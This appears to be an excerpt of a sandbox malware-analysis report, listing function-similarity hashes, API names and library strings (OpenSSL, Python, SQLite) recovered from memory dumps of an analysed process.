                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: R_new$R_set_debug$ErrorLastM_freeR_clear_errorR_set_error
                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                • API String ID: 1370845099-1722249466
                                                                                                                                                                                                                • Opcode ID: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
                                                                                                                                                                                                                • Instruction ID: c3a9c3365b598757086e66dc4b9c123ddba45ade24933fedb8dd566fa9072e59
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5A19B32E086C392FBA4AEA5D4447BD2291EF41BC4F584432DA3E46689DF3DE881D743

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$ItemObject_$Err_FormatFromImportObjectUnicode_$AttrClearDict_ErrorFilenameImport_LevelModuleModule_
                                                                                                                                                                                                                • String ID: %U.%U$cannot import name %R from %R (%S)
                                                                                                                                                                                                                • API String ID: 3630264407-438398067
                                                                                                                                                                                                                • Opcode ID: fcd6dac6a765cb05053f4bfe7cd39cb166bae5586e68d4d28e2f2c7c25a5bf2f
                                                                                                                                                                                                                • Instruction ID: e8adaa27b3ce954ecea7e414dc0944b6fd82e8c83c3588c95c4d48b170aa7a5e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fcd6dac6a765cb05053f4bfe7cd39cb166bae5586e68d4d28e2f2c7c25a5bf2f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34512D36A08B82C1EA588F91E84477D63A2BB45FD6F448031CE6E47B54EF3CE4569702

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
• Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: R_newX_ctrl$R_get_flagsR_set_debugX_get0_cipher$O_test_flags
                                                                                                                                                                                                                • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_bytes
                                                                                                                                                                                                                • API String ID: 2309317691-176253594
                                                                                                                                                                                                                • Opcode ID: 2e71b247f815af5fdb73305ed2dee3af8b68089cb2368134a97cf839ed5b4a1c
                                                                                                                                                                                                                • Instruction ID: 81d799da0edb5d6c03bb0d5e664aad55f64c5377e85955b52c3ff880eb76e269
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e71b247f815af5fdb73305ed2dee3af8b68089cb2368134a97cf839ed5b4a1c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D028A22A08B8686EB50DFA5D4847BD27A1FB44BE8F180075DE6E47B99DF3CE445C702

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
• Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem.c$read_state_machine
                                                                                                                                                                                                                • API String ID: 0-3323778802
                                                                                                                                                                                                                • Opcode ID: 226199113d5c6b0f94b2c4bd83232d79919058d5f83b7f5b7b7cc92fd9dd9c15
                                                                                                                                                                                                                • Instruction ID: 6e3f24cf3d72d778296c0034f6746c307a636629e579466f601dea80ec3ad4db
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 226199113d5c6b0f94b2c4bd83232d79919058d5f83b7f5b7b7cc92fd9dd9c15
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF917C32E0868781EB60AFA5D4583BD2761FF44BC8F584136DA3E47695DE3CE486E702

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
• Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_lib.c$ssl_write_internal
                                                                                                                                                                                                                • API String ID: 1552677711-2859347552
                                                                                                                                                                                                                • Opcode ID: f0637090c2e1248d2c4bd495b210b8b391bd17863f591ec7249c3c5e694070ae
                                                                                                                                                                                                                • Instruction ID: 74d1e8f2ad75f8259fe56eed024893df87d12f00b37c6a2c44900e20585b3781
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0637090c2e1248d2c4bd495b210b8b391bd17863f591ec7249c3c5e694070ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9541AF31A0CB8286F754EB94E8413ED2251EF84BD4F544131EA6E477E6DF3CE8458742

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Unicode_$FromInternPlaceSizeString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2745024575-0
                                                                                                                                                                                                                • Opcode ID: 091893d1f0e79c71c802a693a5176002506af28f025ec817263c4d69333cf0a2
                                                                                                                                                                                                                • Instruction ID: 60ab74fdc260bc553551c3e757c28a47e95cd2b9c1072d3fa21630646deed10c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 091893d1f0e79c71c802a693a5176002506af28f025ec817263c4d69333cf0a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E071AF35D0EB83C5EA5A8FE8E94833C33E9AF54BD4F184434C92E86650EF2EA4458713

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu., xrefs: 00007FF8E7004221
                                                                                                                                                                                                                • Base Connection.__init__ not called., xrefs: 00007FF8E7004261
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
• Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_Thread_get_thread_ident$DeallocFormatModuleModule_ObjectStateStringType_Weakref_
                                                                                                                                                                                                                • String ID: Base Connection.__init__ not called.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.
                                                                                                                                                                                                                • API String ID: 2571765474-2092554567
                                                                                                                                                                                                                • Opcode ID: 8c03bb0be16753a7d61ffbf7de6e139517abf82c47afcab64f99bd497c573e4f
                                                                                                                                                                                                                • Instruction ID: 9f98f81a0dccc506f621d917811508afada1b9ebb90e85fa3e4fcc3c4e58a5a5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c03bb0be16753a7d61ffbf7de6e139517abf82c47afcab64f99bd497c573e4f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75311032B08A01C2EF548BA5E89066D63A4FF96FE4F540431DA6D87764CF7DE8828315

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
• Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Long_Object_True$Arg_DoubleFloat_KeywordsModuleModule_StateType_Unpack
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2710640889-0
                                                                                                                                                                                                                • Opcode ID: eb4ed405b9ba4c793bd57a7410cc763f9b4ec134fc6694bdbee7a3781cb9725e
                                                                                                                                                                                                                • Instruction ID: 033c2885e006864abd4faf59b4105b1d33c0bf59673fe435fcf53890d6d6a5af
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb4ed405b9ba4c793bd57a7410cc763f9b4ec134fc6694bdbee7a3781cb9725e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18817D71A0DA8286EE658FA5E44437E63A1BF46BE4F140835DE6D83798DF3CF444A702

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
• Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: R_newR_set_debug
                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem.c$write_state_machine
                                                                                                                                                                                                                • API String ID: 193678381-552286378
                                                                                                                                                                                                                • Opcode ID: 1d6bb93f5b3c9fc934879ae7831a669262a7cca94352ee649c788080de7cb4f3
                                                                                                                                                                                                                • Instruction ID: f8634951d38c361b7e977138461fdfbf9891868a68493e64fb002d9b31bd7ac4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d6bb93f5b3c9fc934879ae7831a669262a7cca94352ee649c788080de7cb4f3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6A19E32A0868282EB64DFA5D4543BD23A0FF45BC8F444136DA3E436A9DF7CE945CB06

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
• Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_lib.c$ssl_read_internal
                                                                                                                                                                                                                • API String ID: 1552677711-1892056158
                                                                                                                                                                                                                • Opcode ID: 7473d06a2407873355388ad239ca0f238b91fb0b4b2db5c5823ba31df924bc96
                                                                                                                                                                                                                • Instruction ID: acaed67cdfbb0c974e2fc1d9865cc639ea833f71ac8ec355a885f0cf9e1009d4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7473d06a2407873355388ad239ca0f238b91fb0b4b2db5c5823ba31df924bc96
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB319071A0C74186E754EB99E4413AD3660FF84BC4F544036EAAE477A6DF3CE441CB42
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
• Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: R_newR_set_debug
                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem_lib.c$tls_get_message_header
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$FileReadmemset
                                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: C_get_current_jobR_newR_set_debugR_set_error
                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_lib.c$SSL_do_handshake
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$CreateFile
                                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocEval_Thread$RestoreSavesqlite3_close_v2sqlite3_get_autocommit
                                                                                                                                                                                                                • String ID: ROLLBACK
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                • String ID: argument 1$execute$str
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: J_nid2snR_fetchR_pop_to_markR_set_mark
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastM_freeR_clear_error
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcmpmemcpy
                                                                                                                                                                                                                • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                • API String ID: 1784268899-1330295256
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577473923.00007FF8E6FB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF8E6FB0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575627628.00007FF8E6F31000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8E6F30000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577634657.00007FF8E6FC1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF8E6FC0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575166000.00007FF8E6F11000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FF8E6F10000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: -$-Inf$0123456789ABCDEF0123456789abcdef$NaN$VUUU$gfff$null
                                                                                                                                                                                                                • API String ID: 2221118986-3207396689
                                                                                                                                                                                                                • Opcode ID: af73fd97df12b0cb68ea068138ad00953fbec6a3a5724eb1a500301cc5c283e8
                                                                                                                                                                                                                • Instruction ID: 7075d73c82fed48ea880a9e9c45825d3ae2912e57b80ce53bf555bbe1e8315c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: af73fd97df12b0cb68ea068138ad00953fbec6a3a5724eb1a500301cc5c283e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2F1356AB2C3AA85E7618AA8954077E7FE1EB417C4F0C0136DACD476D1DE2CE845CB02
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
